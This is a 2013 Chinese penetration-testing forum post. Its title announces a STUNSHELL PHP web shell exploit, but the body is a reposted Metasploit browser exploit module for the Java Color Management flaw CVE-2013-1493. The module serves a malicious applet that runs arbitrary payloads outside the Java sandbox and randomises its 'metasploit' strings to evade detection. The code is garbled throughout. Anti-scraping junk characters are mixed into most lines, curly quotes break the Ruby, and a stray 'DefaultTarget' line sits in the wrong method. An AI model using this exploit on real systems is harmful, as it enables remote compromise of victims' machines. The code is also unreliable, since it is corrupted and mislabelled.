中国网络渗透测试联盟

标题: STUNSHELL PHP Web Shell远程执行代码 [打印本页]

---

作者: admin    时间: 2013-4-4 17:31
标题: STUNSHELL PHP Web Shell远程执行代码
##
! v" s+ N2 u5 E8 u) E
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
$ H" L8 p# S* F' q) b- [# o# http://metasploit.com/
% M  M) k. `7 Q! `! F##
+ d4 }; L0 W0 n7 k) ]3 \require ‘msf/core’
require ‘rex’
* s8 F& a. \" Y& V  }# \class Metasploit3 < Msf::Exploit::Remote
2 D* ]: p/ u" w. M/ bRank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
* R) T7 Z  d9 t5 f4 Dinclude Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
: P: o' `) ?6 o( i* ^def initialize( info = {} )
super( update_info( info,
0 V/ K# W9 `7 C. u3 Z* k‘Name’ => ‘Java CMM Remote Code Execution’,
6 r& O/ E: h( Y9 V: d( D/ P) `‘Description’ => %q{
  R  n: y- c; S+ {  h% sThis module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
0 ^4 h; {" |$ ~$ c- ~- _) B$ F7 Land March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
3 w; J, e' Z0 @; dand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
, O# }. r# O& Gsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
warning in order to run the malicious applet.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
* {, G: H# M  W. o  ]# N'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
+ B4 v/ o- c& a& A( q],
‘References’ =>
[
* I* T) G2 R: Z  I[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
7 h5 ~; T, U1 {: a- ]! k' N[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
& W/ T1 o: z9 n  Y% _  u" I[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
) X) z' l5 n- \- T[ 'URL', 'http://pastie.org/pastes/6581034' ]
% |2 S/ y& n4 s9 w) s],
7 |: C# z8 `% M‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
: H' ~- `8 i1 P. W' k‘Targets’ =>
[
[ 'Generic (Java Payload)',
; T, ]8 N6 e+ m9 V{
  ~3 T4 w7 p6 A8 Y+ t9 |'Platform' => 'java',
5 R  t0 X/ c; g4 g% ]$ m. ^/ u'Arch' => ARCH_JAVA
}
0 a  Q4 m1 \( w& l3 H4 L8 {],
[ 'Windows x86 (Native Payload)',
- y' B+ p5 o/ W{
8 l+ f3 b0 d% L" [4 r0 ]'Platform' => 'win',
'Arch' => ARCH_X86
4 Q- E  s* A; }! D# |! Y}
]
],
) Y* d& z; y1 |9 C# R2 w% [‘‘DisclosureDate’ => ‘Mar 01 2013′
))
2 z4 S$ Z! C$ W9 n# Rend
$ J' o5 V1 H; I5 L/ s3 edef setup
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
* a) r; i! y8 A@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
' _7 y% h  s7 ~# `@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
@init_class.gsub!(“Init”, @init_class_name)
super
end
( {) A' n# w9 {8 y7 k0 [9 ]" L' gdef on_request_uri(cli, request)
9 i% r! ?) @4 z: o3 d# G7 tprint_status(“handling request for #{request.uri}”)
case request.uri
$ ^& i% e& C: l3 n: O" Dwhen /\.jar$/i
. P8 s" Y+ Y8 [8 G3 ~jar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
. e8 E. Q: @1 u% _/ ]( hjar.add_file(“MyColorSpace.class”, @color_space_class)
: r2 B' |) _6 ]DefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
5 w8 ]  u; b; {5 l$ wpayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
$ {0 V4 v: V$ A1 Yentry.name.gsub!(“Payload”, payload_str)
. D5 \" m' U7 mentry.data = entry.data.gsub(“metasploit”, metasploit_str)
1 s# ^8 S2 i  O# F. v2 K0 Yentry.data = entry.data.gsub(“Payload”, payload_str)
) E! j' j7 t2 g& E1 z0 e}
' z/ W: S* g3 t6 \jar.build_manifest
  G9 Y) D" L9 I' V8 ~) Usend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
when /\/$/
payload = regenerate_payload(cli)
if not payload
! K3 L4 J& N' x" h0 X1 Vprint_error(“Failed to generate the payload.”)
send_not_found(cli)
return
8 x. a. F  v% v, i1 y$ Iend
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
" X. W5 n$ e/ L$ o6 m" W. O1 helse
& A4 m, ^; a- Q  jsend_redirect(cli, get_resource() + ‘/’, ”)
end
2 f' n$ m+ S) |& t* Q3 m6 uend
def generate_html
3 X$ f- k* i- c7 G" |html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
! H7 U4 E" ^* _) j5 R& ^html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
  G* p, b, }3 W6 ~- \8 y0 jhtml += %Q|</applet></body></html>|
return html
end
( Y2 V' o7 d8 {6 i" Qend
end

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2